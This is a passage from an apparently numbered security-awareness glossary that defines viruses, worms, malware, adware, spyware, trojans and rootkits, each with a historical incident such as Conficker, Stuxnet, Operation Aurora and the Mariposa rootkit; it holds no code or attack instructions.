A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.

Examples

Intramar, the French Navy computer network, was infected with Conficker on 15 January 2009. The network was subsequently quarantined, forcing aircraft at several airbases to be grounded because their flight plans could not be downloaded.

In January 2010, the Greater Manchester Police computer network was infected, leading to its disconnection for three days from the Police National Computer as a precautionary measure; during that time, officers had to ask other forces to run routine checks on vehicles and people.

20. Worm:

A computer worm is a self-replicating malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer. Unlike a virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, for example by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

Example:

Stuxnet is a computer worm which affected Iran's Bushehr nuclear power plant in September 2010. Designed to target weaknesses in Siemens electronic industrial systems, it is thought to be capable of seizing control of industrial plants and to be the first 'worm' created for this purpose. The complexity of its design and targeted purpose left Western computer experts suggesting it could only have been the product of a "nation state". Mahmoud Liayi, from Iran's Ministry of Industries, is quoted as saying, "an electronic war has been launched against Iran". As well as targeting nuclear power stations, it is also capable of attacking systems which manage water supplies, oil rigs and other utilities.

21. Malware:

Malware is short for malicious software. Malware is not the same as defective software, that is, software that has a legitimate purpose but contains harmful bugs. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software.

Example

On January 13, 2010, Google Inc. announced that operators from within China had hacked into its Google China operation, stealing intellectual property and, in particular, accessing the email accounts of human rights activists. The attack was thought to have been part of a more widespread cyber attack on companies within China which has become known as Operation Aurora. Intruders were thought to have launched a zero-day attack, exploiting a weakness in the Microsoft Internet Explorer browser, the malware used being a modification of the Trojan Hydraq. Concerned about the possibility of hackers taking advantage of this previously unknown weakness in Internet Explorer, the Government of Germany, then France, issued warnings not to use the browser.

22. Adware:

Adware, or advertising-supported software, is any software package which automatically plays, displays, or downloads advertisements to a computer after the software is installed on it or while the application is being used. Advertising functions are integrated into or bundled with the software, which is often designed to note what Internet sites the user visits and to present advertising pertinent to the types of goods or services featured there.

23. Spyware:

Spyware is a type of malware that is installed on computers and collects little bits of information at a time about users without their knowledge. The presence of spyware is typically hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spyware such as keyloggers is installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Example

WordPress Attacks

Blog platforms have always been vulnerable to attacks due to newly developed spyware. Research shows that 56 percent of all compromised blogs are attacked more than once. WordPress (used by more than 13.9 million blogs), the world's most commonly used blogging software platform, was hacked numerous times throughout 2010.

Numerous vulnerabilities were known to exist during the height of the attacks. GoDaddy (which hosts 43 million domains and other hosting sites) saw persistent attacks in 2010. Something else worth noting is that when celebrity blogs are hacked, many people assume this means public defacement or an attempt to defame celebrity status. Although this happens on occasion, most attacks target financial gain.

24. Trojan:

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.

Example

According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83 percent of the global malware detected in the world". This type of malware has a relationship with worms, as it spreads with the help given by worms and travels across the Internet with them.

On February 18, 2010, Microsoft announced that a BSoD problem on some Windows machines, which was triggered by a batch of Patch Tuesday updates, was caused by the Alureon Trojan.

25. Rootkit:

A rootkit is a type of software that is designed to gain administrator-level control over a computer system without being detected. In virtually all cases, the purpose and motive is to perform malicious operations on a target host computing system at a later date without the knowledge of the administrators or users of that system. Rootkits can be installed in hardware or software, targeting the BIOS, hypervisor, boot loader, kernel or, less commonly, libraries or applications.

Example

According to the Associated Press, in 2010 Spanish police arrested three ringleaders behind the Mariposa rootkit, which infected 12.7 million PCs, stealing credit card and banking information. Infected computers were at more than half of the Fortune 1,000 companies and 40 major banks. The Mariposa rootkit was one of the world's largest and appears to be more sophisticated than the rootkit that was used to hack Google Inc.
